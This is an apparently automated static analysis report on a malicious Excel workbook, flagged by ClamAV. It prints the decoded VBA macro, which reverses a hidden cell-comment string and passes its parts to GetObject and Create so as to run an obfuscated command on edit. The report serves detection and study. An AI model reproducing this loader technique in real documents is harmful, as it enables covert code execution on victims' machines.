Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 10ec185be9504c09…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 136.9 KB
Created: 2015-06-05 18:17:20 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2020-09-15
MD5: c1ad13e65ca16578fe507339eb92ee40
SHA-1: 99d5e5f80d56a97aed19a49285de064f268f2377
SHA-256: 10ec185be9504c09a3c52c97abc34b879f4224459f154a57a56ab15df1829208
Risk score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample is an OOXML (Excel) workbook containing VBA macros. In the Sheet1 module, a Worksheet_Change handler reads the text of the comment attached to cell D500, reverses it, and splits the result on "###"; one part is passed to GetObject and the other to the returned object's Create method. GetObject is often abused to execute arbitrary code, and storing its arguments reversed inside a cell comment is likely intended to obfuscate the payload and defeat simple string scans. The comment text itself is not among the extracted artifacts, so the actual GetObject moniker and Create argument are not visible in this report. The ClamAV detection Win.Malware.Agent-9377073-0 further supports a malicious classification.

Heuristics (3)

  • ClamAV: Win.Malware.Agent-9377073-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Malware.Agent-9377073-0
  • VBA project inside OOXML (severity: medium, 1 related finding, rule: OOXML_VBA)
    Document contains a VBA project: VBA macros present
  • GetObject call (severity: high, rule: OLE_VBA_GETOBJ)
    The VBA code calls GetObject

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1333 bytes
SHA-256: 36dd99bb7a053cf703cf5fa176134e67e0d4ae0056a5b948ca7102028a6b6e7e
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
Range("T540").Value = 770.15
End Sub
  



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Worksheet_Change(ByVal target As Range)
Dim JFKB, eoczh, KupGdv

With ThisWorkbook
  JFKB = .ActiveSheet.Range("D500").Comment.Text
 
  eoczh = Split(Reverse(JFKB), "###")

  KupGdv = eZoKg(eoczh(1), eoczh(0))
  End With
End Sub

Function eZoKg(A2, A1)
Dim GKtRGIw, ppUOJPSB, pPfo
Set GKtRGIw = GetObject(A1)
ppUOJPSB = A2

pPfo = GKtRGIw.Create(ppUOJPSB)

End Function

Function Reverse(Text)
    Dim i As Integer
    Dim StrNew As String
    Dim strOld As String
    strOld = Trim(Text)
    For i = 1 To Len(strOld)
      StrNew = Mid(strOld, i, 1) & StrNew
    Next i
    Reverse = StrNew
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 19456 bytes
SHA-256: b276edc0c93016eef12dc1f17fb1a6de5381ef0f00b87223fb5351c2b1018bfd